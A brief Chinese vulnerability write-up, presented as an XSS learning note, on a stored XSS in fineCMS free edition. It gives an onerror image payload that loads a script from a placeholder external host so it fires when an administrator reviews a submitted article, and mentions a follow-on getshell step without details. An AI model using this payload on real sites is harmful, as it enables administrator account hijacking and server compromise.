漏洞细节
注册一个用户,在发表文章的地方发表文章
在编辑器里加入一张图片
用firebug修改图片地址 加入onerror属性
οnerrοr=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js'
因为发表的文章需要后台管理员审核的,当管理员审核的时候触发漏洞
然后是getshell
有了后台xss都好办
在修改版权处
保存以后
【漏洞学习——XSS】fineCMS免费版xss+getshell
总会有不期而遇的温暖. 和生生不息的希望。